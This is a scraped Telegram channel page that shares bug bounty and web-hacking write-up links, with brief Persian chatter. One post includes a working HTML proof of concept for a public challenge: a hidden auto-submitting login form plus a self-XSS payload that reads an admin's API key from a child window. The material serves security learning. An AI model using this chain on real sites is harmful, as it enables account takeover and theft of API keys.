BugBounty & Hacking Resources – Telegram
BugBounty & Hacking Resources
@projectzeroTM
1.18K subscribers
22 photos
2 videos
5 files
362 links
Download Telegram
About
Blog
Apps
Platform
Join
BugBounty & Hacking Resources
1.18K subscribers
BugBounty & Hacking Resources
https://itm4n.github.io/reinventing-powershell/
itm4n’s blog
Reinventing PowerShell in C/C++
I like PowerShell, I like it a lot! I like its versatility, its ease of use, its integration with the Windows operating system, but it also has a few features, such as AMSI, CLM, and other logging capabilities, that slow it down. You know, I’m thinking about…
🔥21
776 viewsbot
BugBounty & Hacking Resources
https://medium.com/@renwa/client-side-path-traversal-cspt-bug-bounty-reports-and-techniques-8ee6cd2e7ca1
Medium
Client Side Path Traversal (CSPT) Bug Bounty Reports and Techniques
Over the past year, CSPT bugs have gained significant attention, with numerous blogs and disclosed reports highlighting their impact…
1
835 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://blog.doyensec.com/2024/07/02/cspt2csrf.html
Doyensec
Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF
To provide users with a safer browsing experience, the IETF proposal named “Incrementally Better Cookies” set in motion a few important changes to address Cross-Site Request Forgery (CSRF) and other client-side issues. Soon after, Chrome and other major browsers…
1
1.02K viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://www.landh.tech/blog/20250327-we-hacked-gemini-source-code/
5
851 viewsγαsιη
BugBounty & Hacking Resources
https://www.utsa.edu/today/2025/04/story/utsa-researchers-investigate-AI-threats.html
4
686 viewsyasin
BugBounty & Hacking Resources
https://ghintel.secrets.ninja
🔥2👍1
606 viewsSepehr
BugBounty & Hacking Resources
HTML_POC_ON_ATTACKER_WEBSITE:


<!DOCTYPE html>
<html>
<head>
  <noscript>attacker website</noscript>
</head>
<body>
  <button onclick="run()">click</button>

  <form id="myForm" method="POST" action="http://site.com/index.php" style="display:none;">
    <input type="hidden" name="username" value="user">
    <input type="hidden" name="password" value="pass">
    <input type="hidden" name="login" value="">
  </form>

  <noscript>
    function run() {
      window.zwin = window.open("http://site.com/index.php", "childWindow", "width=600,height=400");
      setTimeout(() => {
        document.getElementById("myForm").submit();
      }, 3000);
    }
  </noscript>
</body>
</html>






self-xss in name:


<noscript>zwins = window.open('', 'childWindow'); key = zwins.document.querySelector('.api-key p').textContent; alert(key);</noscript>




https://x.com/yshahinzadeh/status/1911847626472825233?s=61
X (formerly Twitter)
YS (@YShahinzadeh) on X
[white box challenge]
Can you convert the Self-XSS into a 1-click ATO? this challenge is based on a real world bug, a semi-novel way to exploit Self-XSS. challenge objective is to steal admin's API key, give it a shot:

https://t.co/USYCPgX7kr

online instance:…
👏8👍2
788 viewsedited  
BugBounty & Hacking Resources
https://coopergyoung.com/exacerbating-cross-site-noscripting-the-iframe-sandwich/
Cooper Young
Exacerbating Cross-Site Scripting: The Iframe Sandwich - Cooper Young
I’m starting this post with adoration for the Critical Thinking Podcast. The podcast launched around the time I began hacking full-time, and I consider it my companion. It is required listening for bug bounty hunters, but I recommend it to anyone involved…
4
678 viewsAbolFazl
BugBounty & Hacking Resources
https://x.com/moeinerfanian/status/1912599404558839825
X (formerly Twitter)
MOEIN (@moeinerfanian) on X
🚨 Just dropped Eye Of Ra on GitHub!
Track bug bounty programs across HackerOne, Bugcrowd(WIP), Intigriti(WIP) & YesWeHack(WIP) with live updates + Discord alerts 📡💥

Open source & ready to hunt
🔗 https://t.co/gtGFdZBzOt

#bugbounty #infosec #hackerone #bugcrowd…
71
674 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://x.com/thelilnix/status/1912558357635801536
X (formerly Twitter)
LIL NIX (@thelilnix) on X
When you use "Tagged Templates" (e.g, alert`123`), JavaScript passes something like this to the function:
alert(["123"])
NOTE: Since alert uses "toString" on the given parameter, it becomes ["123"].toString() and then "123".
1
701 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-get-account-takeover-via-idor-form-jwt-caaf7ea58aa
Medium
How I was able to get account takeover via IDOR form JWT
Hello guys, today I’m gonna explain how I got IDOR and exploit it to make account takeover.
1
712 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://x.com/neotrony/status/1914724953989259381?s=46
🔥133
676 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources
https://x.com/neotrony/status/1914724953989259381?s=46
واسه یکی دوتاش که جالب بودن، تنگ میکنم و توی یه بلاگ توضیح میدم👌
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍32
695 viewsMeydi
BugBounty & Hacking Resources
BugBounty & Hacking Resources
واسه یکی دوتاش که جالب بودن، تنگ میکنم و توی یه بلاگ توضیح میدم👌
هرکی نکنه 🧬
👌8👍4
722 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
BugBounty & Hacking Resources
هرکی نکنه 🧬
😂😂😂😂
🤣4
760 viewsMeydi
BugBounty & Hacking Resources
https://x.com/garethheyes/status/1915488202405593136?s=46
X (formerly Twitter)
Gareth Heyes \u2028 (@garethheyes) on X
Want to know how I discovered this vector? Read the blog...

https://t.co/RAKpV7hSes
3🔥11
685 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://seanpesce.blogspot.com/2024/09/exploiting-android-client-webviews-with.html
Blogspot
Exploiting Android Client WebViews with Help from HSTS
TL;DR I discovered a one-click account takeover vulnerability in a popular Indonesian Android app called Tokopedia . Th...
4
666 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://003random.com/posts/meta-bountycon-instagram-writeup/
003Random
How I Exposed Instagram's Private Posts by Blocking Users
Discover how a security loophole in Instagram's oEmbed feature enabled unauthorized access to private posts. Journey from BountyCon(Edu) to the vulnerability's discovery, exploitation, and resolution.
7
665 viewsSepehr
BugBounty & Hacking Resources
https://weirdmachine.medium.com/google-cloud-account-takeover-via-url-parsing-confusion-c5e47389b7c7
Medium
Google Cloud Account Takeover via URL Parsing Confusion
TL;DR
1
746 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://siunam321.github.io/research/python-dirty-arbitrary-file-write-to-rce-via-writing-shared-object-files-or-overwriting-bytecode-files/
siunam's Website
Python Dirty Arbitrary File Write to RCE via Writing Shared Object Files Or Overwriting Bytecode Files
In Python, if dirty Arbitrary File Write (AFW) vulnerability exists in the application, it is possible to gain RCE via writing shared object files or overwriting bytecode files. It can be very powerful if you can only write files into the source code's directory…
1
790 viewsᴍͥᴏᴇͣɪͫɴ
BugBounty & Hacking Resources
https://x.com/garethheyes/status/1920811123923697804
2
650 viewsᴍͥᴏᴇͣɪͫɴ